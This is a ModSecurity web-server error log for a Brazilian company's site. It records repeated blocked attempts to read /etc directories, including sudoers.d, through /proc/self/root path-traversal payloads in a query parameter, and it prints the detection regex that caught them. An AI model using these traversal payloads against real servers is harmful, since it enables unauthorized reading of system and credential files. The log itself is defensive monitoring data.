[Mon Mar 16 08:16:22.506670 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.241.46:54108] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmho6lpbStxTqkSktRfQAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:16:23.459949 2026] [:error] [pid 10772:tid 140411674785536] [client 74.7.243.203:35576] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmh_9ocpUE4ed4uDzSnwAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:16:23.720848 2026] [:error] [pid 10709:tid 140411649607424] [client 74.7.241.46:54122] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmhxXjF1vJNtV6CWrergAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:16:24.992574 2026] [:error] [pid 21946:tid 140411699963648] [client 74.7.241.46:54124] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmiHbQATo66fKoS7wuQgAAAMU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:16:25.918993 2026] [:error] [pid 32654:tid 140411683178240] [client 74.7.243.203:35588] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmiQlT9VtDQc7bgUyL0wAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:16:26.371057 2026] [:error] [pid 32654:tid 140411607643904] [client 74.7.241.46:54126] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmiglT9VtDQc7bgUyL1AAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:16:27.578113 2026] [:error] [pid 21805:tid 140411725141760] [client 74.7.241.46:54132] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmi7ABkC4fWIHEf8HPowAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:16:32.683757 2026] [:error] [pid 32654:tid 140411699963648] [client 74.7.243.203:35592] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmkAlT9VtDQc7bgUyL3QAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:16:35.835655 2026] [:error] [pid 32654:tid 140411590858496] [client 74.7.241.46:40024] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmkwlT9VtDQc7bgUyL4AAAARI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:16:36.183925 2026] [:error] [pid 21533:tid 140411658000128] [client 74.7.243.203:44656] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmlHjZBu2q05ozVU85TQAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:16:37.152342 2026] [:error] [pid 11972:tid 140411599251200] [client 74.7.241.46:40026] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmlZqj1wV0Si-OkefNLAAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:16:38.503931 2026] [:error] [pid 21946:tid 140411574073088] [client 74.7.241.46:50202] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmlnbQATo66fKoS7wuRQAAANQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:16:39.666500 2026] [:error] [pid 21946:tid 140411582465792] [client 74.7.243.203:44668] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfml3bQATo66fKoS7wuRwAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:16:40.890950 2026] [:error] [pid 10709:tid 140411599251200] [client 74.7.241.46:50216] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmmBXjF1vJNtV6CWresAAAAdE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:16:43.268525 2026] [:error] [pid 10831:tid 140411658000128] [client 74.7.241.46:50226] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmm46lpbStxTqkSktRfwAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:16:43.373345 2026] [:error] [pid 21946:tid 140411540502272] [client 74.7.243.203:44814] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmm3bQATo66fKoS7wuSgAAANg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:16:44.672232 2026] [:error] [pid 10772:tid 140411599251200] [client 74.7.243.203:44822] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmnP9ocpUE4ed4uDzSoQAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:16:46.911351 2026] [:error] [pid 10772:tid 140411548894976] [client 74.7.241.46:50228] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmnv9ocpUE4ed4uDzSpAAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:16:50.336679 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.243.203:44838] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmotSswJuvopo3lOhE2wAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:16:51.335198 2026] [:error] [pid 10651:tid 140411548894976] [client 74.7.241.46:33730] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmo7ysWC90G-1nBrAqGwAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:16:53.735856 2026] [:error] [pid 21533:tid 140411574073088] [client 74.7.241.46:33736] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmpXjZBu2q05ozVU85XAAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:16:54.832301 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.243.203:52218] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmprABkC4fWIHEf8HPrAAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:16:57.270371 2026] [:error] [pid 11972:tid 140411725141760] [client 74.7.243.203:52234] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmqZqj1wV0Si-OkefNLwAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
